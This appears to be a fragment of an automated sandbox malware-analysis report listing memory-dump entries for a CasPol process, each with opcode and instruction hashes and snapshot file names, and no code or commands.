          • Instruction ID: 79dcdc5f2995586af52dc0d1f755d273c2dcbc8fae22929b5ccf4109ca32dab1
          • Opcode Fuzzy Hash: 24495b891284a148421cdaeb0938fe65e99046af0852fb2e79a33a863b6ceecb
          • Instruction Fuzzy Hash: 91014F73A002098FCF50EF79D8497AABBF5EF48214F504579E515D7248EB349940CB95
          Memory Dump Source
          • Source File: 00000005.00000002.28396743192.00000000217B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 217B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_217b0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 88d85602932f82592df0d6feb081f3d07af51ba21ebbba0a86aeb94c5ca668d9
          • Instruction ID: a8ff995885657d540e45479ca6212c0bb505e1a53230fd71fb7993ffdb5b6760
          • Opcode Fuzzy Hash: 88d85602932f82592df0d6feb081f3d07af51ba21ebbba0a86aeb94c5ca668d9
          • Instruction Fuzzy Hash: 7C113C351082859FD706CB10C950B05FBB1FB8A318F2886EDD9884A6A3C3369A13CB41
          Memory Dump Source
          • Source File: 00000005.00000002.28396743192.00000000217B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 217B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_217b0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6c4f11f00e0768d2a9b8bbb5e16588a565a494c8c0115fc0f4f95ae9bf2ce266
          • Instruction ID: 68f7444feda9a10574999930280a3d848224716693d516481c71a6cb2442f857
          • Opcode Fuzzy Hash: 6c4f11f00e0768d2a9b8bbb5e16588a565a494c8c0115fc0f4f95ae9bf2ce266
          • Instruction Fuzzy Hash: F0113035148284DFD306CB10C950B15FBB1FB8A718F1886DED8894B663C3369912DB81
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 68cf1e18b10c34ba94c02338abb046e6d363efa1ee852ba0cbf703a574398721
          • Instruction ID: 296f953707c18c2eab1415d071b2cbf47a7f7d0ae5009751f7080582d377ede0
          • Opcode Fuzzy Hash: 68cf1e18b10c34ba94c02338abb046e6d363efa1ee852ba0cbf703a574398721
          • Instruction Fuzzy Hash: AAF0246270415C978604AE6C8C8597D628B6BCB378BE44379F129CF3C8CE618C0182A7
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7090894748d413ac21eb3e5435170bc2434bcd84d8af3bc0c97f7283728dd172
          • Instruction ID: 3d4334ffb56591ad746d8153c0dd0acb01b959a9bf58aa536363228b249151b4
          • Opcode Fuzzy Hash: 7090894748d413ac21eb3e5435170bc2434bcd84d8af3bc0c97f7283728dd172
          • Instruction Fuzzy Hash: 74F08C36304209CFCB00EB78D45886977A7EF8A21575488B9E41BDB798EF759C018796
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c6ae5dcd0c0fc1188d97f041600e649be05bf930015c5c666842f0110753c946
          • Instruction ID: e28b54d6abd34911268954bd70af4dabbbcef88711fb3d558208e5a8923525e0
          • Opcode Fuzzy Hash: c6ae5dcd0c0fc1188d97f041600e649be05bf930015c5c666842f0110753c946
          • Instruction Fuzzy Hash: D4F04932204189CFC305E76CE45456837F3ABC931435984AEE00EDB255DE36980B8755
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: dde758187ab3d3f4332da68eff9b02c4cceb2938904dd8614d7d3275379f2b19
          • Instruction ID: ff3826f3ce0ae51eb39c1e77e1e0b0350d05d6571f1df08172fda9aafcd89343
          • Opcode Fuzzy Hash: dde758187ab3d3f4332da68eff9b02c4cceb2938904dd8614d7d3275379f2b19
          • Instruction Fuzzy Hash: 02F01272E112189F8B50DBB995055AFBBF5EF9D224B14417BD509E3301EB348A024B95
          Memory Dump Source
          • Source File: 00000005.00000002.28396743192.00000000217B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 217B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_217b0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e89888924dc60c9d0b9e9c31d7543031a425203bfdf20f910293ed448aa9b7d7
          • Instruction ID: fb8fc1071799e423b0d59fa98aed805e89a96490b469c75a8c3c3348040f79d5
          • Opcode Fuzzy Hash: e89888924dc60c9d0b9e9c31d7543031a425203bfdf20f910293ed448aa9b7d7
          • Instruction Fuzzy Hash: 69F0C8765497846FC7118F06EC40853FFE8DF8623070884ABEC4987212C225B909CB66
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e3ad346781bac66e05cec1d41d2d8dee02a25ed7f3d4e7d18a67280c716976a3
          • Instruction ID: 285bfd84f943f079d164546c0acca81d1a0883da20d3e98fd9a3e2cf06a509d3
          • Opcode Fuzzy Hash: e3ad346781bac66e05cec1d41d2d8dee02a25ed7f3d4e7d18a67280c716976a3
          • Instruction Fuzzy Hash: 0BF0E233B082888BDF01D6B4500417D7399DBAA53CB6802FBC61BDB192DF3A86524787
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 84624dec29258c0f2e7a00c8d90069695e1313b8c78b9c450feb85208b53b610
          • Instruction ID: 42c4b993eff05d6d950b1c2d0fb1cad4ad11fcf5571b4a1bcb91744a465a3f1a
          • Opcode Fuzzy Hash: 84624dec29258c0f2e7a00c8d90069695e1313b8c78b9c450feb85208b53b610
          • Instruction Fuzzy Hash: 54F0E236F1415C9FDB10EA35A920AEEB7E5CB88254F0005BBC91AE7240E7349A024BDA
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 945f67f200afb766e179d1ac84f84fcb9c528af7ecdf88b9c82cfabef4daf693
          • Instruction ID: dbb7acd92da0998c20f5d3bcbb5ca0a5d5eb9efb3650b5431c8edd7844246d7d
          • Opcode Fuzzy Hash: 945f67f200afb766e179d1ac84f84fcb9c528af7ecdf88b9c82cfabef4daf693
          • Instruction Fuzzy Hash: BEF09A72F18189EFCB00CF68D881CAEBBB1BF99A12F1080B7E100D7250D23094098A95
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b51f1dddc2519dbff64f39ecf84de95a42f941b9431c96b53078d3d8e617d2e3
          • Instruction ID: a49297823ed4670f6f955a20184e0fa48105defefd7a935a026648556a2c54b8
          • Opcode Fuzzy Hash: b51f1dddc2519dbff64f39ecf84de95a42f941b9431c96b53078d3d8e617d2e3
          • Instruction Fuzzy Hash: 00E02237709298AFD618C9697408B696389DBCB676F2404FFE508CBB42D83A88024380
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 582b70a7b282c1a90561e8ad77f741037dad8d142ccce6d997c0351bf2521ffc
          • Instruction ID: 82399c878913bfcf446bd1c3516df5014f1f853612d21150fcd300a6e6b9a43f
          • Opcode Fuzzy Hash: 582b70a7b282c1a90561e8ad77f741037dad8d142ccce6d997c0351bf2521ffc
          • Instruction Fuzzy Hash: 8AE0E533A0525D9B9B00DDF8881488FB7A98785260F0005B79A1797200DA7888068692
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 781d16604254f32eec14d8f0439a00009acbee4e231a96fcae83c0a83c1d38e5
          • Instruction ID: 4375ff8591ad1368324b9751a0346d8d1deac040f4109df7cb72b7058ef39e28
          • Opcode Fuzzy Hash: 781d16604254f32eec14d8f0439a00009acbee4e231a96fcae83c0a83c1d38e5
          • Instruction Fuzzy Hash: 8CF08272E402195FCB50CAAC9806BAABBF8EB84210F10007BD60CD3250E23049008760
          Memory Dump Source
          • Source File: 00000005.00000002.28396743192.00000000217B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 217B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_217b0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 64ef1ed2a66415e3a71d77ff208bc821295975e64afd0b66af8e30b204b527ad
          • Instruction ID: 47f48cffdb2b3b5a74ef120b586f54a3fadba13eef96732655d0fae0a24f4c93
          • Opcode Fuzzy Hash: 64ef1ed2a66415e3a71d77ff208bc821295975e64afd0b66af8e30b204b527ad
          • Instruction Fuzzy Hash: 1CF0CD35144644DFC306CB40D940F15FBA6FB89718F24C6ADE94917762C737D913DA81
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e6f7d2e214817720638db734c2542e89ddd025c6b44af51493341b405b63f0b0
          • Instruction ID: c2f1a4657be50b00fa60872ed60889d69e38f03e4f7ebd84256993099761c94d
          • Opcode Fuzzy Hash: e6f7d2e214817720638db734c2542e89ddd025c6b44af51493341b405b63f0b0
          • Instruction Fuzzy Hash: 08F08C3230024DCB8708EA6CE49896D33E7ABC932435884BEE00ECB354DE76DC068785
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 658ccc720e86b4bdafb0926711f0ad416498d6c04872f63929a23da7f107ec7b
          • Instruction ID: e0b4a05df83f433545dd2e8af87d3ed1287ff65c336a2b31b7a6565724521328
          • Opcode Fuzzy Hash: 658ccc720e86b4bdafb0926711f0ad416498d6c04872f63929a23da7f107ec7b
          • Instruction Fuzzy Hash: 3FF0E57291225DDFE700DFB888189AF7BE59B89350F0205FB9803AB204CA7858168A81
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b0568e30ebd38a2fe8ccfa8e80cdf360505313750eb5e5076531c7462c9980c6
          • Instruction ID: 4c04f6c9e8581d510bb4f3459d230a91e44f96ffe154434044e096604e4fe276
          • Opcode Fuzzy Hash: b0568e30ebd38a2fe8ccfa8e80cdf360505313750eb5e5076531c7462c9980c6
          • Instruction Fuzzy Hash: 0AE06532B504649BD7149AB8A4E46ED37D59B94315F1404FAE10ACB661DE25C8415382
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 14672c90f46b0a59f5348a7fceb8641b310ba1b7c0b9276f5e95621fe1129568
          • Instruction ID: 1dc409a61f7c821517d6ca9636f74365517af97c35cfc61eadf659b2e4c570f9
          • Opcode Fuzzy Hash: 14672c90f46b0a59f5348a7fceb8641b310ba1b7c0b9276f5e95621fe1129568
          • Instruction Fuzzy Hash: EDF0A036B102480BDB54ABB888143AD77929FC4925F804278C807CBB80DF3449018B86
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f183c6aa84acf48c3cfb44fe858335f4ca841083142ef77b474560ca4c947f22
          • Instruction ID: 00c9b79d72a2d7256729068793783e6d222675ba6e0b3efcf4ab64174c461b31
          • Opcode Fuzzy Hash: f183c6aa84acf48c3cfb44fe858335f4ca841083142ef77b474560ca4c947f22
          • Instruction Fuzzy Hash: 2AE0D833B6116C9F8F14D6FC94140BD62855FA5536B5444BFE00FD7641EF7588014761
          Memory Dump Source
          • Source File: 00000005.00000002.28396743192.00000000217B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 217B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_217b0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9e76b032ca3331959efa3d467b6074c2457d7e8a03076d21f9be855cce4331e6
          • Instruction ID: 0887f50a10a4fdbdc7b0cfd162e50857aa04577d9b95cbd17a3152d0773dbf5e
          • Opcode Fuzzy Hash: 9e76b032ca3331959efa3d467b6074c2457d7e8a03076d21f9be855cce4331e6
          • Instruction Fuzzy Hash: 29E0927A6006045F9750CF0BFD41462F7D4EB84630748C07FDC4D8B711D639B505CAA6
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 70841c428dbf2a795967444275e2699575912cb2ec234e82668381ee6f50e2e0
          • Instruction ID: c3d133719c889ea75762ddca5fead75fdc69371ff00846474e245d1fdc425d90
          • Opcode Fuzzy Hash: 70841c428dbf2a795967444275e2699575912cb2ec234e82668381ee6f50e2e0
          • Instruction Fuzzy Hash: 3FE0923BF112249FCB54AEE8942842836EADB8C9A2365457ADD06D3358DE344C008FD5
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: de06d2398977272253978ec07fb832928f52dff4d27cfcadc12523a9c6f44261
          • Instruction ID: b2db2cab4e3104dcb26a8d692fe9c7bb663d62c647b843edbcde1e74871cb9fd
          • Opcode Fuzzy Hash: de06d2398977272253978ec07fb832928f52dff4d27cfcadc12523a9c6f44261
          • Instruction Fuzzy Hash: 10E0E537E011249FCB515EB8E4245A87BE2DB88752714457BE842C3358CA384C008F80
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 510f11e6354c285f4510b53624e3036209bdf85042992175da6f77576efba2ef
          • Instruction ID: 9259a127ec239f5990d7168cb975aba6dd197f926cd8248951f6ef2e4b5d2e74
          • Opcode Fuzzy Hash: 510f11e6354c285f4510b53624e3036209bdf85042992175da6f77576efba2ef
          • Instruction Fuzzy Hash: F9E0DF333006489B4214DA58C4A082A77DEEFC6720F5888BEE04DCB300DFB2DC0687D0
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9d6341087884733c5553f3019bb4803f0824e05353a89dca7bee291fb18e99a8
          • Instruction ID: ad90657358708d96339af37dd6b90b09da438035043dcc0acd69fa91871e894a
          • Opcode Fuzzy Hash: 9d6341087884733c5553f3019bb4803f0824e05353a89dca7bee291fb18e99a8
          • Instruction Fuzzy Hash: F3E0C273314198DB0945DE6E9420C7E369F8BC962770400BBD505CB210DF614C0293A3
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5853c318e511e9a5d88043c66e2c183454cc67d93c57c7af79d3ba13421ac7d3
          • Instruction ID: a3cce58ad0b4ea612248b82d96407e441fb3eb9ffe4092dfbb6c67b0c179ed9a
          • Opcode Fuzzy Hash: 5853c318e511e9a5d88043c66e2c183454cc67d93c57c7af79d3ba13421ac7d3
          • Instruction Fuzzy Hash: F3E07D52F8012CAFD701A97898D427E27965FE6659B04007EE109CB244CB04CC014382
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3eb97c46863652051b821d54eda194af532f2bf835083287688d8acaf40e502f
          • Instruction ID: d73f412040835bb67ed3513e64cb49a5a3a44b763a5e8ffa524913694bda1227
          • Opcode Fuzzy Hash: 3eb97c46863652051b821d54eda194af532f2bf835083287688d8acaf40e502f
          • Instruction Fuzzy Hash: C1E08673A9815ECFD7007AAC9004AE867989B55362F1004BFDA09C3194C7A94C408B9A
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ff7559b1d3fd75eff55eb954b6061c7cfcd0b6ea1846ce2e68330f307f28d670
          • Instruction ID: cc66d9ddca4a1f3f291dbe5c7fc0c2bd6681b008425b47fa0b799c4ba784524c
          • Opcode Fuzzy Hash: ff7559b1d3fd75eff55eb954b6061c7cfcd0b6ea1846ce2e68330f307f28d670
          • Instruction Fuzzy Hash: 6DE0CD6B7497A94EC3123F7018140547FA08D8A45479D48E7C0F4C7A66DB3488454792
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: aee6ae00f6e102f1457f2c2f4def05c432176674212481a3a95bdfe2c6962e82
          • Instruction ID: 859b9527b3ffefa212831b698b0bc29b8ab7a8884b0f9d7e81b2b45c7400dbff
          • Opcode Fuzzy Hash: aee6ae00f6e102f1457f2c2f4def05c432176674212481a3a95bdfe2c6962e82
          • Instruction Fuzzy Hash: BAD05B3365415DC7D600799D5404A99368D9B45261F4004BBDB09C7544DBA94C4047DE
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c95ec4b74aa7421668855008fc617e849d553853d984d9cf27aac4ac500140f4
          • Instruction ID: f42529458691b3c09db0bee9e1226b5e9211ce7b858b3f695c5c3bb935ec44c0
          • Opcode Fuzzy Hash: c95ec4b74aa7421668855008fc617e849d553853d984d9cf27aac4ac500140f4
          • Instruction Fuzzy Hash: 74E0C2B27041149BF744CE6888E05386BA7BB91716708849EE40DDB345CA368C02C340
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f436068ce82a0fd35587f00d53f32f0a28ea636449eb621789dbeaa5cccdb21d
          • Instruction ID: 9e507848cc2fc4818aa036f975fd38801b225f7a8d8414e9b812e8b3a83c70f6
          • Opcode Fuzzy Hash: f436068ce82a0fd35587f00d53f32f0a28ea636449eb621789dbeaa5cccdb21d
          • Instruction Fuzzy Hash: BFD0974234012CAB1200B9B95C8043F338F5B826993040438E30ECB204CF04CC0013EB
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d88e80d224610d32247a940d21003769d203092144235f09dd2b47e804556714
          • Instruction ID: 7062c755bbd00f48186491b2e65e4b60475f6ed717cfd6f12234fcd6e9b111f9
          • Opcode Fuzzy Hash: d88e80d224610d32247a940d21003769d203092144235f09dd2b47e804556714
          • Instruction Fuzzy Hash: 41D0C23200939CCBD329DEA19401AE27AE95B05328F0405FE894145D108671E686C393
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bb1e3ac6f3bf152b217709a8e4856e51d652294756c390e42a0cad56b6d1f8a9
          • Instruction ID: 71b8f010d525badfa9e347214be28bfbe9cfcca4b4382c19c00aa3d2f62d6c45
          • Opcode Fuzzy Hash: bb1e3ac6f3bf152b217709a8e4856e51d652294756c390e42a0cad56b6d1f8a9
          • Instruction Fuzzy Hash: 12D0A7213001189BA604D9ADCCD0839B3DFBBC5765308846EB50DD7344CE63DC06C3D1
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e3a9987b016da783df37ed6ebcb5fb20cb11902f259a30293007ab0dfabb6add
          • Instruction ID: 6f4393708a9e47fb165a444673ae7bc40d844baeea87cd466dd28dfef6483182
          • Opcode Fuzzy Hash: e3a9987b016da783df37ed6ebcb5fb20cb11902f259a30293007ab0dfabb6add
          • Instruction Fuzzy Hash: 26D05E227001289B6604D9A988D0839B3DFBBD5665308846AA409D7344CEA29C0683D1
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a9988da7351a3214cb64350fffa9d6679e1ad67b9993a5f425262c1bde6a4ef2
          • Instruction ID: e9038308f38f60818d2be964a7428ccf754cc0f658623a622a8734b4ad594a2a
          • Opcode Fuzzy Hash: a9988da7351a3214cb64350fffa9d6679e1ad67b9993a5f425262c1bde6a4ef2
          • Instruction Fuzzy Hash: D3D05E331492ECDBC624EF699400EA2B2ACBF0B556F4859FFE5C98A600C6F1D88183D5
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: cad7ab4c571b21b2b747d4dec69e145d74a60ac7f8c18600cf93c88c7dfb8561
          • Instruction ID: 3654b4419f8c0dc7016fce014015f7064935bb2f9610c7e7143f32648bda31d0
          • Opcode Fuzzy Hash: cad7ab4c571b21b2b747d4dec69e145d74a60ac7f8c18600cf93c88c7dfb8561
          • Instruction Fuzzy Hash: C4D02B77E0AB98CBC311C754F4D55C87360EF51204F598C9ED4C11B015C330B4008B88
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4bf4ee761470ee85b9826b43caf4143bcdbc0c3d5949887df876967c51b425c4
          • Instruction ID: e5d696c2209921a02ec251e161c92522d3609ce541bdd25591d3f9f20d3a87d9
          • Opcode Fuzzy Hash: 4bf4ee761470ee85b9826b43caf4143bcdbc0c3d5949887df876967c51b425c4
          • Instruction Fuzzy Hash: B2D0A933DB86CCEBEA4089898825FD03B90C729603F000AF3A00E8E0AC80A142024B02
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: be9ea5a257692fb853d75f05a761a21dea2831a50e0ca29f67b55373ed79cef9
          • Instruction ID: afb49749c3f9f828250a13ba85706b41e95512a5f2c073b21aec8ce91d826724
          • Opcode Fuzzy Hash: be9ea5a257692fb853d75f05a761a21dea2831a50e0ca29f67b55373ed79cef9
          • Instruction Fuzzy Hash: C3D0523700A188CACB24CF6881A9E903B30AB2C214B1040FAD04E4A14AC63AA002CA01
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 818b9d473ee92aaf21a3a0532cf15bc29155808d6475251cbb525cc8a269de70
          • Instruction ID: 2eec6992ad22f749c7640d47e58d4b1825d8bc1ecebbe6430a9366cf93cae939
          • Opcode Fuzzy Hash: 818b9d473ee92aaf21a3a0532cf15bc29155808d6475251cbb525cc8a269de70
          • Instruction Fuzzy Hash: F4D0A777885184CFC3148F708C554C83B20EFE2305B1448F5D01143422C636A6139B11
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9c8880bafb61781ad70364ca587c6263afe08046c422358678417a67bb7a91de
          • Instruction ID: d4a77206d42baaca6f6e4aa812ca23b1d588a17f4ea849067e8af5d7a6e07f51
          • Opcode Fuzzy Hash: 9c8880bafb61781ad70364ca587c6263afe08046c422358678417a67bb7a91de
